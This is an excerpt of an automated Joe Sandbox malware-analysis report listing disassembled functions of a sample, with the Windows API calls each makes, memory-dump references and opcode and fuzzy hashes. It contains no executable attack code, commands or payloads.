                                                                                                                                                                  • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                                                                                  • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                                                  • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                                                                                  Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32(?), ref: 004503C8
                                                                                                                                                                  • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                                                                  • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                                                                  • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Proc$Parent
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2351499541-0
                                                                                                                                                                  • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                                                  • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                                                                                  • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                                                  • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                                                                                  Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1795658109-0
                                                                                                                                                                  • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                                                  • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                                                                                  • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                                                  • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                                                                                  Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0047439C
                                                                                                                                                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                                  • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                                                  • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                  • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                                                                  • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                                                                  Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2169480361-0
                                                                                                                                                                  • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                                                  • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                                                                  • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                                                  • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                                                                  Function 00445870 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2796087071-0
                                                                                                                                                                  • Opcode ID: 441e25e70737f6d2f42d4f26ec9aabd4bf8df006be5466b109dabfb61cf36f6a
                                                                                                                                                                  • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                                                                  • Opcode Fuzzy Hash: 441e25e70737f6d2f42d4f26ec9aabd4bf8df006be5466b109dabfb61cf36f6a
                                                                                                                                                                  • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                                                                                  Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                                                                    • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                                                                    • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                  • String ID: cdecl
                                                                                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                                                                                  • Opcode ID: 68fa76b08d2ffb2332fb674fe900a2e07a9f62f6b283609ed48f6b7271aaa11f
                                                                                                                                                                  • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                                                                  • Opcode Fuzzy Hash: 68fa76b08d2ffb2332fb674fe900a2e07a9f62f6b283609ed48f6b7271aaa11f
                                                                                                                                                                  • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                                                                  Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32 ref: 00448C69
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                                                                  • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                                                                  • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 312131281-0
                                                                                                                                                                  • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                                                  • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                                                                  • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                                                  • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                                                                  Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                                                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastacceptselect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 385091864-0
                                                                                                                                                                  • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                                  • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                                                                  • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                                  • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                                                                  Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                  • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                                                  • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                                                                  • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                                                  • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                                                                  Function 00433DF5 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                                                                                                                                                  • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                                                                                                                                                  • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4241681289-0
                                                                                                                                                                  • Opcode ID: b9dd60fc789600814193b10c203562de5ce45e1fa765f6932a0e1556b25623f2
                                                                                                                                                                  • Instruction ID: 66738fc5919b7c3a3c7c4a311c48fd84e22d6c2a66b6279363cc5d51ef299119
                                                                                                                                                                  • Opcode Fuzzy Hash: b9dd60fc789600814193b10c203562de5ce45e1fa765f6932a0e1556b25623f2
                                                                                                                                                                  • Instruction Fuzzy Hash: 832180B6500118AFDB11CF90CD85EEEB379EB8C700F10459AFA0997150DA75AA85CBA4
                                                                                                                                                                  Function 0041F6F9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                  • String ID: [B
                                                                                                                                                                  • API String ID: 1279760036-632041663
                                                                                                                                                                  • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                                                                  • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                                                                                  • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                                                                  • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                                                                                  Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1358664141-0
                                                                                                                                                                  • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                                                  • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
